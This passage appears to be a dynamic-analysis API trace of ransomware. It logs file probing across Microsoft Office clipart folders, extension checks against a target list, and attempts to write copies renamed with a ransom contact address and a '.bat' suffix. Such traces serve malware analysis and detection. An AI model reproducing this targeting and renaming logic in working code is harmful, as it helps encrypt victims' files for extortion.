lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.606] CloseHandle (hObject=0x42c) returned 1 [0159.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.606] lstrlenW (lpString=".doc") returned 4 [0159.606] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.606] lstrlenW (lpString=".docx") returned 5 [0159.606] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0159.606] lstrlenW (lpString=".pdf") returned 4 [0159.606] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.606] lstrlenW (lpString=".xls") returned 4 [0159.606] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.606] lstrlenW (lpString=".xlsx") returned 5 [0159.606] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0159.606] lstrlenW (lpString=".ppt") returned 4 [0159.606] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.606] lstrlenW (lpString=".zip") returned 4 [0159.606] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.606] lstrlenW (lpString=".rar") returned 4 [0159.606] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.606] lstrlenW (lpString=".bz2") returned 4 [0159.606] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.606] lstrlenW (lpString=".7z") returned 3 [0159.606] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.607] lstrlenW (lpString=".dbf") returned 4 [0159.607] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.607] lstrlenW (lpString=".1cd") returned 4 [0159.607] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.607] lstrlenW (lpString=".jpg") returned 4 [0159.607] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.607] lstrlenW (lpString=".doc") returned 4 [0159.607] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.607] lstrlenW (lpString=".docx") returned 5 [0159.607] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0159.607] lstrlenW (lpString=".pdf") returned 4 [0159.607] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.607] lstrlenW (lpString=".xls") returned 4 [0159.607] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.607] lstrlenW (lpString=".xlsx") returned 5 [0159.607] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0159.607] lstrlenW (lpString=".ppt") returned 4 [0159.607] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.607] lstrlenW (lpString=".zip") returned 4 [0159.607] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.607] lstrlenW (lpString=".rar") returned 4 [0159.607] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.607] lstrlenW (lpString=".bz2") returned 4 [0159.608] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.608] lstrlenW (lpString=".7z") returned 3 [0159.608] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.608] lstrlenW (lpString=".dbf") returned 4 [0159.608] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.608] lstrlenW (lpString=".1cd") returned 4 [0159.608] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0159.608] lstrlenW (lpString=".jpg") returned 4 [0159.608] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.608] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0159.608] lstrlenW (lpString="J0107024.WMF") returned 12 [0159.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.610] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=3020) returned 1 [0159.610] CloseHandle (hObject=0x42c) returned 1 [0159.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf")) returned 0x220 [0159.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0159.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.611] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.611] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.611] CloseHandle (hObject=0x42c) returned 1 [0159.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.611] lstrlenW (lpString=".doc") returned 4 [0159.611] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.611] lstrlenW (lpString=".docx") returned 5 [0159.611] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0159.611] lstrlenW (lpString=".pdf") returned 4 [0159.611] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.611] lstrlenW (lpString=".xls") returned 4 [0159.612] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.612] lstrlenW (lpString=".xlsx") returned 5 [0159.612] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0159.612] lstrlenW (lpString=".ppt") returned 4 [0159.612] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.612] lstrlenW (lpString=".zip") returned 4 [0159.612] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.612] lstrlenW (lpString=".rar") returned 4 [0159.612] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.612] lstrlenW (lpString=".bz2") returned 4 [0159.612] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.612] lstrlenW (lpString=".7z") returned 3 [0159.612] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.612] lstrlenW (lpString=".dbf") returned 4 [0159.612] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.612] lstrlenW (lpString=".1cd") returned 4 [0159.612] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.612] lstrlenW (lpString=".jpg") returned 4 [0159.612] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.613] lstrlenW (lpString=".doc") returned 4 [0159.613] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.613] lstrlenW (lpString=".docx") returned 5 [0159.613] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0159.613] lstrlenW (lpString=".pdf") returned 4 [0159.613] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.613] lstrlenW (lpString=".xls") returned 4 [0159.613] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.613] lstrlenW (lpString=".xlsx") returned 5 [0159.613] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0159.613] lstrlenW (lpString=".ppt") returned 4 [0159.613] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.613] lstrlenW (lpString=".zip") returned 4 [0159.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.613] lstrlenW (lpString=".rar") returned 4 [0159.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.613] lstrlenW (lpString=".bz2") returned 4 [0159.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.613] lstrlenW (lpString=".7z") returned 3 [0159.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.613] lstrlenW (lpString=".dbf") returned 4 [0159.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.613] lstrlenW (lpString=".1cd") returned 4 [0159.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0159.614] lstrlenW (lpString=".jpg") returned 4 [0159.614] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.614] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0159.614] lstrlenW (lpString="J0107026.WMF") returned 12 [0159.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.615] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=7632) returned 1 [0159.615] CloseHandle (hObject=0x42c) returned 1 [0159.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf")) returned 0x220 [0159.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0159.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.616] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.616] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.617] CloseHandle (hObject=0x42c) returned 1 [0159.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.617] lstrlenW (lpString=".doc") returned 4 [0159.617] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.617] lstrlenW (lpString=".docx") returned 5 [0159.617] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0159.617] lstrlenW (lpString=".pdf") returned 4 [0159.617] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.617] lstrlenW (lpString=".xls") returned 4 [0159.617] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.617] lstrlenW (lpString=".xlsx") returned 5 [0159.617] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0159.617] lstrlenW (lpString=".ppt") returned 4 [0159.617] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.617] lstrlenW (lpString=".zip") returned 4 [0159.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.617] lstrlenW (lpString=".rar") returned 4 [0159.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.617] lstrlenW (lpString=".bz2") returned 4 [0159.617] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.618] lstrlenW (lpString=".7z") returned 3 [0159.618] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.618] lstrlenW (lpString=".dbf") returned 4 [0159.618] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.618] lstrlenW (lpString=".1cd") returned 4 [0159.618] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.618] lstrlenW (lpString=".jpg") returned 4 [0159.618] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.618] lstrlenW (lpString=".doc") returned 4 [0159.618] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.618] lstrlenW (lpString=".docx") returned 5 [0159.618] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0159.618] lstrlenW (lpString=".pdf") returned 4 [0159.618] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.618] lstrlenW (lpString=".xls") returned 4 [0159.618] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.618] lstrlenW (lpString=".xlsx") returned 5 [0159.618] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0159.618] lstrlenW (lpString=".ppt") returned 4 [0159.618] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.619] lstrlenW (lpString=".zip") returned 4 [0159.619] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.619] lstrlenW (lpString=".rar") returned 4 [0159.619] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.619] lstrlenW (lpString=".bz2") returned 4 [0159.619] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.619] lstrlenW (lpString=".7z") returned 3 [0159.619] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.619] lstrlenW (lpString=".dbf") returned 4 [0159.619] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.619] lstrlenW (lpString=".1cd") returned 4 [0159.619] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0159.619] lstrlenW (lpString=".jpg") returned 4 [0159.619] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.619] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0159.619] lstrlenW (lpString="J0107042.WMF") returned 12 [0159.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.620] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=9048) returned 1 [0159.620] CloseHandle (hObject=0x42c) returned 1 [0159.620] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf")) returned 0x220 [0159.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0159.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.621] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.621] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.621] CloseHandle (hObject=0x42c) returned 1 [0159.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.622] lstrlenW (lpString=".doc") returned 4 [0159.622] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.622] lstrlenW (lpString=".docx") returned 5 [0159.622] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0159.622] lstrlenW (lpString=".pdf") returned 4 [0159.622] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.622] lstrlenW (lpString=".xls") returned 4 [0159.622] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.622] lstrlenW (lpString=".xlsx") returned 5 [0159.622] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0159.622] lstrlenW (lpString=".ppt") returned 4 [0159.622] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.622] lstrlenW (lpString=".zip") returned 4 [0159.622] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.622] lstrlenW (lpString=".rar") returned 4 [0159.622] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.622] lstrlenW (lpString=".bz2") returned 4 [0159.622] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.622] lstrlenW (lpString=".7z") returned 3 [0159.622] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.622] lstrlenW (lpString=".dbf") returned 4 [0159.623] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.623] lstrlenW (lpString=".1cd") returned 4 [0159.623] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.623] lstrlenW (lpString=".jpg") returned 4 [0159.623] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.623] lstrlenW (lpString=".doc") returned 4 [0159.623] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.623] lstrlenW (lpString=".docx") returned 5 [0159.623] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0159.623] lstrlenW (lpString=".pdf") returned 4 [0159.623] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.623] lstrlenW (lpString=".xls") returned 4 [0159.623] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.623] lstrlenW (lpString=".xlsx") returned 5 [0159.623] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0159.623] lstrlenW (lpString=".ppt") returned 4 [0159.623] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.623] lstrlenW (lpString=".zip") returned 4 [0159.623] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.623] lstrlenW (lpString=".rar") returned 4 [0159.623] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.623] lstrlenW (lpString=".bz2") returned 4 [0159.624] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.624] lstrlenW (lpString=".7z") returned 3 [0159.624] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.624] lstrlenW (lpString=".dbf") returned 4 [0159.624] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.624] lstrlenW (lpString=".1cd") returned 4 [0159.624] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0159.624] lstrlenW (lpString=".jpg") returned 4 [0159.624] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.624] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0159.624] lstrlenW (lpString="J0107090.WMF") returned 12 [0159.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.625] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=14132) returned 1 [0159.625] CloseHandle (hObject=0x42c) returned 1 [0159.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf")) returned 0x220 [0159.625] GetFileAttributesW 